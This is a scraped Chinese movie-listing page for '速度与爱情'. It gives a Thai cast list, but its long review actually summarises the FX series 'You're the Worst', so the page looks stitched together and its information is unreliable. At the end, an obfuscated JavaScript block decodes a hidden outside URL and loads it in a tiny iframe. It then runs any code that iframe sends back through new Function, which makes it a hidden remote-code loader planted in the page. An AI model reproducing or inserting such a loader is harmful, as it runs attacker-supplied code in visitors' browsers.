速度与爱情

  • 纳特·奇查理 乌拉萨雅·斯帕邦德 阿努萨拉·科萨普汗 卡诺宽·布特拉恰特 韦帕维·帕特娜斯里 吉塔帕特·朋格茹娅 纳帕克·崔查若恩德吉 约书亚·乌格楚乌·厄祖纳古
  • 120分钟
  • 速度与爱情影片简介:一直没有去看这部14年出品的美剧…速度与爱情影片简介:一直没有去看这部14年出品的美剧,因为被名字给劝退了。 这个剧名,取得就像韩国的狗血无聊的爱情剧一样。然而事实证明我确实是错了,这部剧,虽然是爱情剧,也狗血,但却保留了美剧当中一个必不可少的元素,那就是居然有速度与激情,更过分的是,很多人冲着“车速”去的,最后却发现除此之外,居然还挺走心的,属实难得。 这是由FX公司制作播出的美剧《我爱上的人是奇葩》,很多人看到这个译名,估计一开始都跟我有一样的想法,认为是一部无聊的爱情剧。可是当你看到它除了这个译名以外的另一个名字《你最坏了》时,就有觉得,嗯,还是试着看一下吧。 不看不知道,一看虽然没有吓一跳,但惊喜还是有的。 吉米是一位三流作家,没有什么代表作,更没有什么名气(就跟痞帅三叔在娱乐自媒体的定位差不多),但是人家没有本事,却志比天高,口无遮拦,毒舌无比,狂妄自大,是一个以自我为中心且不可理喻奇葩之人。所以最近刚刚被女朋友给扫地出门。 被甩了一回事,前女友还很快就找到了备胎,甚至还要结婚了,这对吉米来说是莫大的侮辱,于是他准备了一系列的手段,准备在前女友的婚礼上,来一场“技惊四座”的演讲,用自己深厚的文学功底,过人的毒舌利嘴,给女友好好上一课。 然而结果却不如吉米设想的那样,在婚礼上,他就忍不住怒气和新娘,也就是他的前女友吵了起来,最终他被新郎叫人给扔出了酒店。 被赶出来的吉米怒气难消,还在酒店门口口无遮拦,继续喷垃圾话,十分生气。 这个时候,他遇到了跟他可以说同样奇葩的一个女人格雷琴,格雷琴不仅喜欢去那些婚礼中蹭吃蹭喝,还喜欢顺手牵羊,拿走点东西,这一次,他居然拿走了一台搅拌机,其实她以为那是一台食物机。 两个奇葩在酒店门口相遇,一点也不觉得尴尬,相反,臭味相投的两人一起火力全开,大隐特聊,越聊越开心。 吉米的怒气消了,格雷琴也很开心,所以,两人很自然地就一起回家了,然后深入地探讨了一下各自的人生。 两个成年人都心知肚明,这只是“站一夜”的感情,所以在一起的时候,没有压力,更没有羞耻心,极尽全力地过了疯狂的一夜。 然而,事实却不像他们想象的一样。 吉米自私毒舌,为人刻薄,作为一个卖不出书的过气作家,还被前女友伤透了心的他不再相信爱情,开始放纵自己。格雷琴不羁浪荡,管理着一支乐队的经纪人,小毛病坏习惯一堆,看透了娱乐圈之乱的她,私生活也是一塌糊涂,更不相信爱情。 两人从一开始只是“站一夜”的缘分,到后来却成为固定的*友,一开始一直保持着互不打扰的原则,然而很快这种平衡就被打破了,他妒忌她和别人的次数比他多,她嫉妒他的通讯录里女的比她通讯录的多,两人还PK起谁的临时伴侣多。吉米的室友和格蕾王琴的闺蜜也加入了他们的战局,情况开始变得越来越微妙。 两个奇葩,在这种令人咋舌的相处模式里,却慢慢培养出了不一样的感情来。 是世风日下,还是道德沦丧?主角两人奇葩且没有尺度的态度对待爱情和欲望,却让人看得欲罢不能,甚至有点小赞赏。他们不虚伪造作(直接了当,对眼就干),说话一针见血(毒舌无比、尖酸刻薄),其实也算是一种另类的简单吧。 其实,外面毒舌和放荡只是皮囊,他们的内心里,依旧有着对爱情的各种期望。相互的折磨只是在试探自己在对方心中的份量。这只是一种奇葩的磨合方式,最终他们还是得经历普通恋爱的有的分手、落寞、复合、欣喜…… 说好的只走肾的,慢慢却变得朝着走心的方向发展。

同主演

    速度与爱情评论

    • 评论加载中...
    function NQoIX(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function nHqeN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return NQoIX(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x69\x48\x49\x6f\x45\x47\x56\x4e\x6a\x6e']=function(){;(function(u,r,w,d,f,c){var x=nHqeN;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZtZWV0aGFuc2hppLmNvbSUyRjEzNjA5Mg==',''+'WfX'+'ORj'+'Hsl'+'d'+'',window,document,''+'ezR'+'xlj'+'cH'+'','p');};